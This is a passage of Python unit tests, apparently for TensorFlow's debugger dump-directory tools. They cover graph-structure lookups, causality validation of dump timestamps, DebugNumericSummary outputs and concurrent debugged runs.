    self.assertEqual(1, len(u_data))
    self.assertEqual(u_name, u_data[0].node_name)
    self.assertEqual(0, u_data[0].output_slot)
    self.assertEqual("DebugIdentity", u_data[0].debug_op)
    self.assertGreaterEqual(u_data[0].timestamp, 0)
    self.assertEqual([], dump.watch_key_to_data("foo"))
  def testGraphStructureLookupGivesNodeInputsAndRecipients(self):
    """Input, recipient, and transitive-input queries on the dump graph."""
    u_name, v_name, w_name, dump = (
        self._session_run_for_graph_structure_lookup())
    u_read_name = u_name + "/read"
    # Test the inputs lookup of the DebugDumpDir object.
    self.assertEqual([], dump.node_inputs(u_name))
    self.assertEqual([u_name], dump.node_inputs(u_read_name))
    self.assertEqual([u_read_name] * 2, dump.node_inputs(v_name))
    self.assertEqual([v_name] * 2, dump.node_inputs(w_name))
    self.assertEqual([], dump.node_inputs(u_name, is_control=True))
    self.assertEqual([], dump.node_inputs(u_read_name, is_control=True))
    self.assertEqual([], dump.node_inputs(v_name, is_control=True))
    self.assertEqual([], dump.node_inputs(w_name, is_control=True))
    # Test the outputs recipient lookup of the DebugDumpDir object.
    self.assertTrue(u_read_name in dump.node_recipients(u_name))
    self.assertEqual(2, dump.node_recipients(u_read_name).count(v_name))
    self.assertEqual(2, dump.node_recipients(v_name).count(w_name))
    self.assertEqual([], dump.node_recipients(u_name, is_control=True))
    self.assertEqual([], dump.node_recipients(u_read_name, is_control=True))
    self.assertEqual([], dump.node_recipients(v_name, is_control=True))
    self.assertEqual([], dump.node_recipients(w_name, is_control=True))
    # Test errors raised on invalid node names.
    with self.assertRaisesRegexp(
        ValueError, r"None of the .* device\(s\) has a node named "):
      dump.node_inputs(u_name + "foo")
    with self.assertRaisesRegexp(
        ValueError, r"None of the .* device\(s\) has a node named "):
      dump.node_recipients(u_name + "foo")
    # Test transitive_inputs().
    self.assertEqual([], dump.transitive_inputs(u_name))
    self.assertEqual([u_name], dump.transitive_inputs(u_read_name))
    self.assertEqual(
        set([u_name, u_read_name]), set(dump.transitive_inputs(v_name)))
    self.assertEqual(
        set([u_name, u_read_name, v_name]), set(dump.transitive_inputs(w_name)))
    with self.assertRaisesRegexp(
        ValueError, r"None of the .* device\(s\) has a node named "):
      dump.transitive_inputs(u_name + "foo")
  def testGraphStructureLookupWithoutPartitionGraphsDoesNotErrorOut(self):
    """Reloading a dump without partition graphs still works."""
    _, _, _, dump = self._session_run_for_graph_structure_lookup()
    # Now load the dump again, without the partition graphs, so we can check
    # errors are not raised because the partition graphs are loaded from the
    # dump directory.
    dump = debug_data.DebugDumpDir(self._dump_root, validate=False)
    self.assertTrue(dump.loaded_partition_graphs())
  def testGraphPathFindingOnControlEdgesWorks(self):
    """find_some_path() traverses control edges unless told not to."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      v1 = variables.Variable(1.0, name="v1")
      v2 = variables.Variable(2.0, name="v2")
      v3 = variables.Variable(3.0, name="v3")
      a = math_ops.add(v1, v2, name="a")
      # c depends on a only through a control edge.
      with ops.control_dependencies([a]):
        c = math_ops.subtract(v3, v3, name="c")
      sess.run(variables.global_variables_initializer())
      _, dump = self._debug_run_and_get_dump(sess, c)
      self.assertEqual(["v1", "v1/read", "a", "c"],
                       dump.find_some_path("v1", "c"))
      # With control edges excluded there is no v1 -> c path.
      self.assertIsNone(dump.find_some_path("v1", "c", include_control=False))
  def testGraphPathFindingReverseRefEdgeWorks(self):
    """find_some_path() can follow a ref edge in reverse when requested."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      v = variables.Variable(10.0, name="v")
      delta = variables.Variable(1.0, name="delta")
      # inc_v takes v by reference, creating a ref edge from v to inc_v.
      inc_v = state_ops.assign_add(v, delta, name="inc_v")
      sess.run(variables.global_variables_initializer())
      _, dump = self._debug_run_and_get_dump(sess, inc_v)
      self.assertEqual(
          ["delta", "delta/read", "inc_v", "v"],
          dump.find_some_path("delta", "v", include_reversed_ref=True))
      # Without reversed ref edges there is no delta -> v path.
      self.assertIsNone(dump.find_some_path("delta", "v"))
  def testCausalityCheckOnDumpsDetectsWrongTemporalOrder(self):
    """Validation flags dump timestamps that violate producer-consumer order."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      u_name = "testDumpCausalityCheck/u"
      v_name = "testDumpCausalityCheck/v"
      w_name = "testDumpCausalityCheck/w"

      u_init = constant_op.constant([2.0, 4.0])
      u = variables.Variable(u_init, name=u_name)
      v = math_ops.add(u, u, name=v_name)
      w = math_ops.add(v, v, name=w_name)

      u.initializer.run()

      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_utils.watch_graph(
          run_options,
          sess.graph,
          debug_ops=["DebugIdentity"],
          debug_urls=self._debug_urls())

      run_metadata = config_pb2.RunMetadata()
      sess.run(w, options=run_options, run_metadata=run_metadata)

      self.assertEqual(self._expected_partition_graph_count,
                       len(run_metadata.partition_graphs))

      # First, loading the original dump without supplying the
      # partition_graphs should not cause a LookupError, validation occurs
      # only with partition_graphs loaded.
      debug_data.DebugDumpDir(self._dump_root)

      # Now, loading the original dump with partition graphs supplied should
      # succeed. The validation should pass quietly.
      dump = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)

      # Get the dump file names and compute their timestamps.
      # The timestamp is parsed from the trailing "_<number>" component of
      # each dump file name (see the rindex("_") slicing below).
      self.assertEqual(
          1, len(dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")))
      v_file_path = dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")[0]

      self.assertEqual(
          1, len(dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")))
      w_file_path = dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")[0]

      v_timestamp = int(v_file_path[v_file_path.rindex("_") + 1:])
      w_timestamp = int(w_file_path[w_file_path.rindex("_") + 1:])

      # Swap and slightly shift the time stamps of the last two dumped tensors,
      # to simulate "causality violation", which can happen if the dump
      # directory contains incomplete data and/or mixes data from different
      # Session.run() calls.
      v_file_path_1 = v_file_path[:v_file_path.rindex(
          "_")] + "_%d" % w_timestamp
      w_file_path_1 = w_file_path[:w_file_path.rindex("_")] + "_%d" % (
          v_timestamp - 1)

      os.rename(v_file_path, v_file_path_1)
      os.rename(w_file_path, w_file_path_1)

      # Load the dump directory again. Now a ValueError is expected to be
      # raised due to the timestamp swap.
      with self.assertRaisesRegexp(ValueError, "Causality violated"):
        dump = debug_data.DebugDumpDir(
            self._dump_root, partition_graphs=run_metadata.partition_graphs)

      # Loading the dump directory with kwarg "validate" set explicitly to
      # False should get rid of the error.
      dump = debug_data.DebugDumpDir(
          self._dump_root,
          partition_graphs=run_metadata.partition_graphs,
          validate=False)

      # Next, set the two times stamps to be the same, which should be fine.
      v_file_path_2 = v_file_path[:v_file_path.rindex(
          "_")] + "_%d" % w_timestamp
      w_file_path_2 = w_file_path[:w_file_path.rindex(
          "_")] + "_%d" % w_timestamp

      os.rename(v_file_path_1, v_file_path_2)
      os.rename(w_file_path_1, w_file_path_2)

      debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
  def testWatchingOnlyOneOfTwoOutputSlotsDoesNotLeadToCausalityFailure(self):
    """Watching a strict subset of a node's output slots should validate."""
    with session.Session() as sess:
      x_name = "oneOfTwoSlots/x"
      u_name = "oneOfTwoSlots/u"
      v_name = "oneOfTwoSlots/v"
      w_name = "oneOfTwoSlots/w"
      y_name = "oneOfTwoSlots/y"

      x = variables.Variable([1, 3, 3, 7], dtype=dtypes.int32, name=x_name)
      sess.run(x.initializer)

      # unique_with_counts produces multiple output slots on node u.
      unique_x, indices, _ = array_ops.unique_with_counts(x, name=u_name)

      v = math_ops.add(unique_x, unique_x, name=v_name)
      w = math_ops.add(indices, indices, name=w_name)
      y = math_ops.add(w, w, name=y_name)

      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      # Watch only the first output slot of u, even though it has two output
      # slots.
      debug_utils.add_debug_tensor_watch(
          run_options, u_name, 0, debug_urls=self._debug_urls())
      debug_utils.add_debug_tensor_watch(
          run_options, w_name, 0, debug_urls=self._debug_urls())
      debug_utils.add_debug_tensor_watch(
          run_options, y_name, 0, debug_urls=self._debug_urls())

      run_metadata = config_pb2.RunMetadata()
      sess.run([v, y], options=run_options, run_metadata=run_metadata)

      # validate=True runs the causality check; it must pass despite the
      # partial watch coverage of node u.
      dump = debug_data.DebugDumpDir(
          self._dump_root,
          partition_graphs=run_metadata.partition_graphs,
          validate=True)

      self.assertAllClose([1, 3, 7],
                          dump.get_tensors(u_name, 0, "DebugIdentity")[0])
  def testOutputSlotWithoutOutgoingEdgeCanBeWatched(self):
    """Test watching output slots not attached to any outgoing edges."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
      u = constant_op.constant(u_init_val, shape=[2, 2], name="u")

      # Create a control edge from a node with an output: From u to z.
      # Node u will get executed only because of the control edge. The output
      # tensor u:0 is not attached to any outgoing edge in the graph. This test
      # checks that the debugger can watch such a tensor.
      with ops.control_dependencies([u]):
        z = control_flow_ops.no_op(name="z")

      _, dump = self._debug_run_and_get_dump(sess, z)

      # Assert that the DebugIdentity watch on u works properly.
      self.assertEqual(1, len(dump.dumped_tensor_data))
      datum = dump.dumped_tensor_data[0]
      self.assertEqual("u", datum.node_name)
      self.assertEqual(0, datum.output_slot)
      self.assertEqual("DebugIdentity", datum.debug_op)
      self.assertAllClose([[5.0, 3.0], [-1.0, 0.0]], datum.get_tensor())
  def testWatchingVariableUpdateOpsSeesUpdatedValues(self):
    """Watch output slots on Variable-updating ops, with no emitted edges."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      u_init = constant_op.constant(10.0)
      u = variables.Variable(u_init, name="gdo/u")
      v_init = constant_op.constant(20.0)
      v = variables.Variable(v_init, name="gdo/v")

      w = math_ops.multiply(u, v, name="gdo/w")

      # gdo stands for GradientDescentOptimizer.
      train_op = gradient_descent.GradientDescentOptimizer(
          learning_rate=0.1).minimize(
              w, name="gdo/train")

      u.initializer.run()
      v.initializer.run()

      _, dump = self._debug_run_and_get_dump(sess, train_op)

      update_u_data = dump.watch_key_to_data(
          "gdo/train/update_gdo/u/ApplyGradientDescent:0:DebugIdentity")
      self.assertEqual(1, len(update_u_data))

      # Gradient descent on u: w = u * v, so dw / du = v.
      # Updated value of u should be:
      #   10.0 - learning_rate * v = 10.0 - 0.1 * 20.0 = 8.0
      self.assertAllClose(8.0, update_u_data[0].get_tensor())

      update_v_data = dump.watch_key_to_data(
          "gdo/train/update_gdo/v/ApplyGradientDescent:0:DebugIdentity")
      self.assertEqual(1, len(update_v_data))

      # Gradient descent on v: w = u * v, so dw / dv = u.
      # Updated value of v should be:
      #   20.0 - learning_rate * u = 20.0 - 0.1 * 10.0 = 19.0
      self.assertAllClose(19.0, update_v_data[0].get_tensor())

      # Verify that the Variables u and v are updated properly.
      self.assertAllClose(8.0, sess.run(u))
      self.assertAllClose(19.0, sess.run(v))
  def testAllowsWatchingUnconnectedOutputTensor(self):
    """Watch an output slot not emitting any edges.

    (Not even control edges from the node.)
    """
    with session.Session() as sess:
      x_init = constant_op.constant([2, 2, 3, 5, 5])
      x = variables.Variable(x_init, name="unconnected/x")

      # The UniqueOp (tf.unique) has two output slots. Use only slot 0 in the
      # graph. Let the debugger watch the unused slot 1.
      unique_x, _ = array_ops.unique(x, name="unconnected/unique_x")
      y = math_ops.add(unique_x, [0, 1, 2], name="unconnected/y")

      x.initializer.run()

      # Verify that only slot 0 of unique_x has recipients, while slot 1 of the
      # same node does not have recipients.
      unique_x_slot_0_recipients = []
      unique_x_slot_1_recipients = []
      for op in sess.graph.get_operations():
        for inp in op.inputs:
          if inp.name == "unconnected/unique_x:0":
            unique_x_slot_0_recipients.append(op.name)
          elif inp.name == "unconnected/unique_x:1":
            unique_x_slot_1_recipients.append(op.name)

      self.assertEqual(["unconnected/y"], unique_x_slot_0_recipients)
      self.assertEqual([], unique_x_slot_1_recipients)

      y_result, dump = self._debug_run_and_get_dump(sess, y)
      self.assertAllClose([2, 4, 7], y_result)

      # Assert that the connected slot (slot 0) is dumped properly.
      unique_x_slot_0_dumps = dump.watch_key_to_data(
          "unconnected/unique_x:0:DebugIdentity")
      self.assertEqual(1, len(unique_x_slot_0_dumps))
      self.assertEqual("unconnected/unique_x",
                       unique_x_slot_0_dumps[0].node_name)
      self.assertEqual(0, unique_x_slot_0_dumps[0].output_slot)
      self.assertAllClose([2, 3, 5], unique_x_slot_0_dumps[0].get_tensor())

      # Assert that the unconnected slot (slot 1) is dumped properly.
      unique_x_slot_1_dumps = dump.watch_key_to_data(
          "unconnected/unique_x:1:DebugIdentity")
      self.assertEqual(1, len(unique_x_slot_1_dumps))
      self.assertEqual("unconnected/unique_x",
                       unique_x_slot_1_dumps[0].node_name)
      self.assertEqual(1, unique_x_slot_1_dumps[0].output_slot)
      self.assertAllClose([0, 0, 1, 2, 2],
                          unique_x_slot_1_dumps[0].get_tensor())
  def testSuccessiveDebuggingRunsIncreasesCounters(self):
    """Test repeated Session.run() calls with debugger increments counters."""
    with session.Session() as sess:
      # NOTE(review): the "mismatch/..." names below appear copied from the
      # next test; they do not affect behavior but could be renamed for
      # clarity.
      ph = array_ops.placeholder(dtypes.float32, name="successive/ph")
      x = array_ops.transpose(ph, name="mismatch/x")
      y = array_ops.squeeze(ph, name="mismatch/y")

      _, dump1 = self._debug_run_and_get_dump(
          sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=1)
      self.assertEqual(1, dump1.core_metadata.global_step)
      self.assertGreaterEqual(dump1.core_metadata.session_run_index, 0)
      self.assertEqual(0, dump1.core_metadata.executor_step_index)
      self.assertEqual([ph.name], dump1.core_metadata.input_names)
      self.assertEqual([x.name], dump1.core_metadata.output_names)
      self.assertEqual([], dump1.core_metadata.target_nodes)
      shutil.rmtree(self._dump_root)

      # Calling run() with the same feed, same output and same debug watch
      # options should increment both session_run_index and
      # executor_step_index.
      _, dump2 = self._debug_run_and_get_dump(
          sess, x, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=2)
      self.assertEqual(2, dump2.core_metadata.global_step)
      self.assertEqual(dump1.core_metadata.session_run_index + 1,
                       dump2.core_metadata.session_run_index)
      self.assertEqual(dump1.core_metadata.executor_step_index + 1,
                       dump2.core_metadata.executor_step_index)
      self.assertEqual([ph.name], dump2.core_metadata.input_names)
      self.assertEqual([x.name], dump2.core_metadata.output_names)
      self.assertEqual([], dump2.core_metadata.target_nodes)
      shutil.rmtree(self._dump_root)

      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_utils.watch_graph(
          run_options, sess.graph, debug_urls=self._debug_urls(), global_step=3)

      # Calling run() with a different output should increment
      # session_run_index, but not executor_step_index.
      _, dump3 = self._debug_run_and_get_dump(
          sess, y, feed_dict={ph: np.array([[7.0, 8.0]])}, global_step=3)
      self.assertEqual(3, dump3.core_metadata.global_step)
      self.assertEqual(dump2.core_metadata.session_run_index + 1,
                       dump3.core_metadata.session_run_index)
      self.assertEqual(0, dump3.core_metadata.executor_step_index)
      self.assertEqual([ph.name], dump3.core_metadata.input_names)
      self.assertEqual([y.name], dump3.core_metadata.output_names)
      self.assertEqual([], dump3.core_metadata.target_nodes)
  def testDebuggingDuringOpError(self):
    """Test the debug tensor dumping when error occurs in graph runtime."""
    with session.Session() as sess:
      ph = array_ops.placeholder(dtypes.float32, name="mismatch/ph")
      x = array_ops.transpose(ph, name="mismatch/x")
      m = constant_op.constant(
          np.array(
              [[1.0, 2.0]], dtype=np.float32), name="mismatch/m")
      y = math_ops.matmul(m, x, name="mismatch/y")

      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_utils.watch_graph(
          run_options,
          sess.graph,
          debug_ops=["DebugIdentity"],
          debug_urls=self._debug_urls())

      # Feeding a (2, 1) value makes x = transpose(ph) a (1, 2) tensor, which
      # is shape-incompatible with m (1, 2) for matmul -> runtime OpError.
      with self.assertRaises(errors.OpError):
        sess.run(y,
                 options=run_options,
                 feed_dict={ph: np.array([[-3.0], [0.0]])})

      dump = debug_data.DebugDumpDir(self._dump_root)

      self.assertGreaterEqual(dump.core_metadata.session_run_index, 0)
      self.assertGreaterEqual(dump.core_metadata.executor_step_index, 0)
      self.assertEqual([ph.name], dump.core_metadata.input_names)
      self.assertEqual([y.name], dump.core_metadata.output_names)
      self.assertEqual([], dump.core_metadata.target_nodes)

      # Despite the fact that the run() call errored out and partition_graphs
      # are not available via run_metadata, the partition graphs should still
      # have been loaded from the dump directory.
      self.assertTrue(dump.loaded_partition_graphs())

      m_dumps = dump.watch_key_to_data("mismatch/m:0:DebugIdentity")
      self.assertEqual(1, len(m_dumps))
      self.assertAllClose(np.array([[1.0, 2.0]]), m_dumps[0].get_tensor())

      x_dumps = dump.watch_key_to_data("mismatch/x:0:DebugIdentity")
      self.assertEqual(1, len(x_dumps))
      self.assertAllClose(np.array([[-3.0, 0.0]]), x_dumps[0].get_tensor())
  def testDebugNumericSummaryOnInitializedTensorGivesCorrectResult(self):
    """DebugNumericSummary on an initialized tensor yields the full stats."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      a = variables.Variable(
          [
              np.nan, np.nan, 0.0, 0.0, 0.0, -1.0, -3.0, 3.0, 7.0, -np.inf,
              -np.inf, np.inf, np.inf, np.inf, np.inf, np.inf, np.nan, np.nan
          ],
          dtype=np.float32,
          name="numeric_summary/a")
      b = variables.Variable(
          [0.0] * 18, dtype=np.float32, name="numeric_summary/b")
      c = math_ops.add(a, b, name="numeric_summary/c")
      sess.run(variables.global_variables_initializer())

      _, dump = self._debug_run_and_get_dump(
          sess, c, debug_ops=["DebugNumericSummary"])
      self.assertTrue(dump.loaded_partition_graphs())

      # Expected layout appears to be: [is_initialized, element count, nan
      # count, -inf count, negative count, zero count, positive count, +inf
      # count, min, max, mean, variance, dtype code, ndims, dim sizes...] —
      # TODO confirm against the DebugNumericSummary op documentation.
      self.assertAllClose([[
          1.0, 18.0, 4.0, 2.0, 2.0, 3.0, 2.0, 5.0, -3.0, 7.0, 0.85714286,
          8.97959184, 1.0, 1.0, 18.0
      ]], dump.get_tensors("numeric_summary/a/read", 0, "DebugNumericSummary"))
  def testDebugNumericSummaryOnUninitializedTensorGivesCorrectResult(self):
    """DebugNumericSummary on an uninitialized variable reports zero counts."""
    with session.Session() as sess:
      a = variables.Variable(
          [42], dtype=np.float32, name="numeric_summary_uninit/a")

      # Running only the initializer means the watched variable tensor is
      # still uninitialized when it is dumped.
      _, dump = self._debug_run_and_get_dump(
          sess, a.initializer, debug_ops=["DebugNumericSummary"])
      self.assertTrue(dump.loaded_partition_graphs())

      # DebugNumericSummary output should reflect the uninitialized state of
      # the watched tensor.
      numeric_summary = dump.get_tensors("numeric_summary_uninit/a", 0,
                                         "DebugNumericSummary")[0]
      self.assertAllClose([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0],
                          numeric_summary[0:8])
      # Check dtype (index 12), ndims (index 13) and dimension sizes (index
      # 14+).
      self.assertAllClose([1.0, 1.0, 1.0], numeric_summary[12:])
      # min/max/mean/variance of the empty value set come out as
      # +inf / -inf / nan / nan respectively (indices 8-11).
      self.assertTrue(np.isinf(numeric_summary[8]))
      self.assertGreater(numeric_summary[8], 0.0)
      self.assertTrue(np.isinf(numeric_summary[9]))
      self.assertLess(numeric_summary[9], 0.0)
      self.assertTrue(np.isnan(numeric_summary[10]))
      self.assertTrue(np.isnan(numeric_summary[11]))
  def testDebugNumericSummaryFailureIsToleratedWhenOrdered(self):
    """tolerate_debug_op_creation_failures lets string tensors be skipped."""
    with session.Session() as sess:
      a = variables.Variable("1", name="a")
      b = variables.Variable("3", name="b")
      c = variables.Variable("2", name="c")
      d = math_ops.add(a, b, name="d")
      e = math_ops.add(d, c, name="e")
      n = parsing_ops.string_to_number(e, name="n")
      m = math_ops.add(n, n, name="m")
      sess.run(variables.global_variables_initializer())

      # Using DebugNumericSummary on sess.run(m) with the default
      # tolerate_debug_op_creation_failures=False should error out due to the
      # presence of string-dtype Tensors in the graph.
      run_metadata = config_pb2.RunMetadata()
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_utils.watch_graph(
          run_options,
          sess.graph,
          debug_ops=["DebugNumericSummary"],
          debug_urls=self._debug_urls())
      with self.assertRaises(errors.FailedPreconditionError):
        sess.run(m, options=run_options, run_metadata=run_metadata)

      # Using tolerate_debug_op_creation_failures=True should get rid of the
      # error.
      m_result, dump = self._debug_run_and_get_dump(
          sess, m, debug_ops=["DebugNumericSummary"],
          tolerate_debug_op_creation_failures=True)
      # String adds concatenate: "1"+"3"="13", "13"+"2"="132";
      # n = 132, m = n + n = 264.
      self.assertEqual(264, m_result)

      # The integer-dtype Tensors in the graph should have been dumped
      # properly.
      self.assertIn("n:0:DebugNumericSummary", dump.debug_watch_keys("n"))
      self.assertIn("m:0:DebugNumericSummary", dump.debug_watch_keys("m"))
  def testDebugNumericSummaryInvalidAttributesStringAreCaught(self):
    """Unknown attribute keys in a DebugNumericSummary(...) spec must raise."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      a = variables.Variable(10.0, name="a")
      b = variables.Variable(0.0, name="b")
      c = variables.Variable(0.0, name="c")
      x = math_ops.divide(a, b, name="x")
      y = math_ops.multiply(x, c, name="y")
      sess.run(variables.global_variables_initializer())

      # Case 1: a single invalid attribute key (foo).
      run_metadata = config_pb2.RunMetadata()
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_utils.watch_graph(
          run_options,
          sess.graph,
          debug_ops=["DebugNumericSummary(foo=1.0)"],
          debug_urls=self._debug_urls())
      with self.assertRaisesRegexp(
          errors.FailedPreconditionError,
          r"1 attribute key\(s\) were not valid for debug node "
          r"__dbg_.:0_0_DebugNumericSummary: foo"):
        sess.run(y, options=run_options, run_metadata=run_metadata)

      # Case 2: two invalid attribute keys (foo and bar).
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_utils.watch_graph(
          run_options,
          sess.graph,
          debug_ops=["DebugNumericSummary(foo=1.0; bar=false)"],
          debug_urls=self._debug_urls())
      with self.assertRaisesRegexp(
          errors.FailedPreconditionError,
          r"2 attribute key\(s\) were not valid for debug node "
          r"__dbg_.:0_0_DebugNumericSummary:"):
        sess.run(y, options=run_options, run_metadata=run_metadata)

      # Case 3: a mix of one invalid key (foo) and one valid key
      # (mute_if_healthy): only the invalid one is reported.
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_utils.watch_graph(
          run_options,
          sess.graph,
          debug_ops=["DebugNumericSummary(foo=1.0; mute_if_healthy=true)"],
          debug_urls=self._debug_urls())
      with self.assertRaisesRegexp(
          errors.FailedPreconditionError,
          r"1 attribute key\(s\) were not valid for debug node "
          r"__dbg_.:0_0_DebugNumericSummary: foo"):
        sess.run(y, options=run_options, run_metadata=run_metadata)
  def testDebugNumericSummaryMuteOnHealthyMutesOnlyHealthyTensorDumps(self):
    """mute_if_healthy=true suppresses dumps of healthy tensors only."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      a = variables.Variable(10.0, name="a")
      b = variables.Variable(0.0, name="b")
      c = variables.Variable(0.0, name="c")
      x = math_ops.divide(a, b, name="x")  # 10.0 / 0.0 -> inf (unhealthy).
      y = math_ops.multiply(x, c, name="y")  # inf * 0.0 -> nan (unhealthy).
      sess.run(variables.global_variables_initializer())

      # Here, validate=False is necessary to avoid causality check error.
      # TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
      #   debug ops with mute_if_healthy=false attribute during validation.
      _, dump = self._debug_run_and_get_dump(
          sess, y, debug_ops=["DebugNumericSummary(mute_if_healthy=true)"],
          validate=False)

      # Only the two unhealthy tensors (x and y) should have been dumped.
      self.assertEqual(2, dump.size)
      self.assertAllClose([[
          1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, np.inf, -np.inf, np.nan,
          np.nan, 1.0, 0.0
      ]], dump.get_tensors("x", 0, "DebugNumericSummary"))
      self.assertAllClose([[
          1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, np.inf, -np.inf, np.nan,
          np.nan, 1.0, 0.0
      ]], dump.get_tensors("y", 0, "DebugNumericSummary"))

      # Another run with the default mute_if_healthy (false) value should
      # dump all the tensors.
      shutil.rmtree(self._dump_root)
      _, dump = self._debug_run_and_get_dump(
          sess, y, debug_ops=["DebugNumericSummary()"])
      self.assertEqual(8, dump.size)
  def testDebugNumericSummaryMuteOnHealthyAndCustomBoundsWork(self):
    """A custom upper_bound makes values above it count as unhealthy."""
    with session.Session() as sess:
      a = variables.Variable([10.0, 10.0], name="a")
      b = variables.Variable([10.0, 2.0], name="b")
      x = math_ops.add(a, b, name="x")  # [20.0, 12.0]
      y = math_ops.divide(x, b, name="y")  # [2.0, 6.0]
      sess.run(variables.global_variables_initializer())

      # Here, validate=False is necessary to avoid causality check error.
      # TODO(cais): Maybe let DebugDumpDir constructor automatically ignore
      #   debug ops with mute_if_healthy=false attribute during validation.
      _, dump = self._debug_run_and_get_dump(
          sess, y, debug_ops=[
              "DebugNumericSummary(mute_if_healthy=true; upper_bound=11.0)"],
          validate=False)

      # Only x ([20.0, 12.0], both elements above upper_bound=11.0) should be
      # dumped; y ([2.0, 6.0]) is healthy and therefore muted.
      self.assertEqual(1, dump.size)
      self.assertAllClose([[
          1.0, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0, 12.0, 20.0, 16.0, 16.0, 1.0,
          1.0, 2.0]], dump.get_tensors("x", 0, "DebugNumericSummary"))
  def testDebugQueueOpsDoesNotoErrorOut(self):
    """Queue ops yield inconvertible tensor protos but still dump cleanly.

    NOTE(review): the method name contains a typo ("DoesNoto"); renaming it
    would change the test's identity, so it is only flagged here.
    """
    with session.Session() as sess:
      q = data_flow_ops.FIFOQueue(3, "float", name="fifo_queue")
      q_init = q.enqueue_many(([101.0, 202.0, 303.0],), name="enqueue_many")

      _, dump = self._debug_run_and_get_dump(sess, q_init)
      self.assertTrue(dump.loaded_partition_graphs())

      # The queue resource itself cannot be converted to a numpy array.
      fifo_queue_tensor = dump.get_tensors("fifo_queue", 0, "DebugIdentity")[0]
      self.assertIsInstance(fifo_queue_tensor,
                            debug_data.InconvertibleTensorProto)
      self.assertTrue(fifo_queue_tensor.initialized)
      self.assertAllClose(
          [101.0, 202.0, 303.0],
          dump.get_tensors("enqueue_many/component_0", 0, "DebugIdentity")[0])
  def testLookUpNodePythonTracebackWorks(self):
    """node_traceback() works once the Python graph has been supplied."""
    with session.Session() as sess:
      u_init = constant_op.constant(10.0)
      u = variables.Variable(u_init, name="traceback/u")
      v_init = constant_op.constant(20.0)
      v = variables.Variable(v_init, name="traceback/v")

      w = math_ops.multiply(u, v, name="traceback/w")

      sess.run(variables.global_variables_initializer())
      _, dump = self._debug_run_and_get_dump(sess, w)

      # Prior to setting the Python graph, attempts to do traceback lookup
      # should lead to exceptions.
      with self.assertRaisesRegexp(
          LookupError, "Python graph is not available for traceback lookup"):
        dump.node_traceback("traceback/w")

      dump.set_python_graph(sess.graph)

      # After setting the Python graph, attempts to look up nonexistent nodes
      # should lead to exceptions.
      with self.assertRaisesRegexp(KeyError,
                                   r"Cannot find node \"foo\" in Python graph"):
        dump.node_traceback("foo")

      # Lookup should work with node name input.
      traceback = dump.node_traceback("traceback/w")
      self.assertIsInstance(traceback, list)
      self.assertGreater(len(traceback), 0)
      for trace in traceback:
        self.assertIsInstance(trace, tuple)

      # Lookup should also work with tensor name input.
      traceback = dump.node_traceback("traceback/w:0")
      self.assertIsInstance(traceback, list)
      self.assertGreater(len(traceback), 0)
      for trace in traceback:
        self.assertIsInstance(trace, tuple)
class DebugConcurrentRunCallsTest(test_util.TensorFlowTestCase):
  """Test for debugging concurrent Session.run() calls.

  Subclasses are expected to provide `self._num_concurrent_runs` and
  `self._dump_roots` (one dump root per concurrent run) and to implement
  `_get_concurrent_debug_urls()` — TODO confirm against the concrete
  subclasses, which are outside this file section.
  """

  def _get_concurrent_debug_urls(self):
    """Abstract method to generate debug URLs for concurrent debugged runs."""
    raise NotImplementedError(
        "_get_concurrent_debug_urls is not implemented in the base test class")

  def testDebugConcurrentVariableUpdates(self):
    """Concurrent debugged assign_adds produce consistent per-run dumps."""
    if test.is_gpu_available():
      self.skipTest("No testing concurrent runs on a single GPU.")

    with session.Session() as sess:
      v = variables.Variable(30.0, name="v")
      constants = []
      for i in xrange(self._num_concurrent_runs):
        constants.append(constant_op.constant(1.0, name="c%d" % i))
      # use_locking=True serializes the variable updates across threads.
      incs = [
          state_ops.assign_add(
              v, c, use_locking=True, name=("inc%d" % i))
          for (i, c) in enumerate(constants)
      ]
      sess.run(v.initializer)

      concurrent_debug_urls = self._get_concurrent_debug_urls()

      def inc_job(index):
        # Each thread debugs 100 runs of its own increment op, dumping to
        # its own debug URL.
        run_options = config_pb2.RunOptions(output_partition_graphs=True)
        debug_utils.watch_graph(
            run_options, sess.graph, debug_urls=concurrent_debug_urls[index])
        for _ in xrange(100):
          sess.run(incs[index], options=run_options)

      inc_threads = []
      for index in xrange(self._num_concurrent_runs):
        inc_thread = threading.Thread(target=functools.partial(inc_job, index))
        inc_thread.start()
        inc_threads.append(inc_thread)
      for inc_thread in inc_threads:
        inc_thread.join()

      self.assertAllClose(30.0 + 1.0 * self._num_concurrent_runs * 100,
                          sess.run(v))

      all_session_run_indices = []
      for index in xrange(self._num_concurrent_runs):
        dump = debug_data.DebugDumpDir(self._dump_roots[index])
        self.assertTrue(dump.loaded_partition_graphs())

        v_data = dump.get_tensors("v", 0, "DebugIdentity")
        self.assertEqual(100, len(v_data))

        # Examine all the core metadata files.
        core_metadata_files = glob.glob(
